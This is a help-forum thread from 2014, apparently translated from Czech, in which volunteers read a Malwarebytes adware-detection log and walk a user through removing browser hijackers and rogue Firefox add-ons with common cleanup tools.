PUP.Optional.WebSearchInfo, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://websearch.wonderfulsearches.info ... Z&unqvl=60, Good: (www.google.com), Bad: (http://websearch.wonderfulsearches.info ... Z&unqvl=60),,[bcb8d6f2fd7e91a53a7d7c51897b4cb4]
PUP.Optional.WebSearchInfo, HKU\S-1-5-21-288487796-1725444996-988690671-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|Start Page, http://websearch.wonderfulsearches.info ... Z&unqvl=60, Good: (www.google.com), Bad: (http://websearch.wonderfulsearches.info ... Z&unqvl=60),,[a1d33f89c9b29c9a34822ca1659f8977]

Folders: 6
PUP.Optional.MySearch.A, C:\Program Files (x86)\MySearch, , [75ff19afc2b92b0b0da85b941fe301ff],
PUP.Optional.EZDownloader.A, C:\Program Files (x86)\EZDownloader, , [452f02c6e59659dd17025367d032966a],
PUP.Optional.Booster.A, C:\Program Files (x86)\SW-Booster, , [6212b117e299b38310d78d45b250aa56],
PUP.Optional.MultiPlug.A, C:\ProgramData\priCEchop, , [c9ab9f29e794f64076e3d6fe9171a45c],
PUP.Optional.MultiPlug.A, C:\Program Files (x86)\priCEchop, , [acc85672f18a6fc73c1ea92b778b11ef],
PUP.Optional.Booster.A, C:\ProgramData\PlutoApp\SW-Booster, , [284c03c589f21d19c004f8e7ea1806fa],

Files: 14
PUP.Optional.Preload, C:\Program Files (x86)\priCEchop\E05zLS.x64.dll, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, C:\Program Files (x86)\priacechop\y.x64.dll, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, C:\Program Files (x86)\ppRicceCihop\w.x64.dll, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, C:\Program Files (x86)\Adblocker\fKy7Pv9w.x64.dll, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, C:\Program Files (x86)\MySearch\ohxKrxZ.x64.dll, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Installrex, C:\Users\Jakub\Downloads\Windows 7 Ultimate Crack Genuine Activator ~ Free Crack Files Download.exe, , [95df497f542741f541a0f1ba9a6748b8],
PUP.Optional.MySearch.A, C:\Program Files (x86)\MySearch\ohxKrxZ.tlb, , [75ff19afc2b92b0b0da85b941fe301ff],
PUP.Optional.MySearch.A, C:\Program Files (x86)\MySearch\ohxKrxZ.dat, , [75ff19afc2b92b0b0da85b941fe301ff],
PUP.Optional.WebSearch.A, C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\searchplugins\WebSearch.xml, , [4331428668139c9a19e91ee9699a60a0],
PUP.Optional.MultiPlug.A, C:\ProgramData\priCEchop\qTdKFb2.dat, , [c9ab9f29e794f64076e3d6fe9171a45c],
PUP.Optional.MultiPlug.A, C:\Program Files (x86)\priCEchop\E05zLS.dat, , [acc85672f18a6fc73c1ea92b778b11ef],
PUP.Optional.MultiPlug.A, C:\Program Files (x86)\priCEchop\E05zLS.tlb, , [acc85672f18a6fc73c1ea92b778b11ef],
PUP.Optional.Booster.A, C:\ProgramData\PlutoApp\SW-Booster\2060245759.ini, , [284c03c589f21d19c004f8e7ea1806fa],
PUP.Optional.WonderfulSearches.A, C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\prefs.js, Good: (), Bad: (user_pref("keyword.URL", "http://websearch.wonderfulsearches.info/?pid=2145&r=2014/08/17&hid=2400403269968452107&lg=EN&cc=CZ&unqvl=60&l=1&q=");), ,[3e36b612b7c40b2b6fa6fc0e798c2fd1]

Physical Sectors: 0
(No malicious items detected)


(end)

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 20:17
by Pic
Paste the Avast alert you mentioned here.

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 20:32
by Falla Džej
The alerts change. After starting Firefox, for example 5 alerts pop up with five different URLs...

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 20:43
by Pic
Right, that's enough for me. One of the Firefox add-ons is doing it. I no longer remember which one. Disable 2-3 of them and restart Firefox. If you disabled the right one, the Avast alerts will no longer appear. Otherwise re-enable the disabled ones, disable others and restart Firefox again.

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 20:54
by Falla Džej
Thank you very much for the help. I use only 3 add-ons (AdBlock Plus, Avast and SpeedDial). About five more with strange names had appeared there. But I can't work out how they got there...

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 20:58
by Pic
So it's solved? Still wait for the opinion of the virus fighters, in case you have some other problem.
My apologies to the virus fighters for stepping into their kingdom.

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 21:03
by Falla Džej
Problem solved. Thanks again for the advice ;). I think the virus fighters' work won't be needed any more...

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 21:06
by Pic
It costs you nothing, only time. So wait for their opinion on the log. If you did not install those add-ons, it could have been some virus that you still have on the PC.

Re: Antivirus keeps reporting a problem - please check my log

Posted: 20 Aug 2014 09:34
by jaro3
let's run through it once more:

Run AdwCleaner again (on Windows Vista or Windows 7, right-click AdwCleaner and choose "Run as administrator"),
click "Prohledat-Scan", and after the scan click "Vymazat-Clean".

The program performs the repair; after the automatic restart it will not show the log (C:\AdwCleaner [S?].txt); paste its entire contents here.

Download Junkware Removal Tool by Thisisu

to your desktop.

Disable your antivirus program. Right-click JRT.exe and choose "Run as administrator". You will be prompted to press any key to continue. Press one.
The program's scan starts. The scan may take a long time, depending on the number of infections. When the scan finishes, a log (JRT.txt) appears, which is saved on the desktop.
Please copy its entire contents here.

- run MbAM again and choose Scan Now
- after the program finishes, a prompt appears; click "Quarantine All (delete selected)" and "Export Log" and choose "text file", give the file a name and save it somewhere. Copy the entire contents of that log here.

Download RogueKiller by Adlice Software
32-bit:
http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe
64-bit:
http://www.sur-la-toile.com/RogueKiller ... lerX64.exe
to your desktop.
- Close all other programs and browsers.
- On Vista and Win7 run RogueKiller.exe as administrator; on XP by double-clicking it.
- wait until the Prescan (the search for malicious processes) finishes.
- Check that you have the following ticked:
MBR check
Faked check
Antirootkit

- Then click "Scan".
- The program scans the PC's processes. After the scan click "Report" and copy the entire contents of the log here.
If the program is blocked, try running it several times. If the program still won't start and work, rename it to winlogon.exe.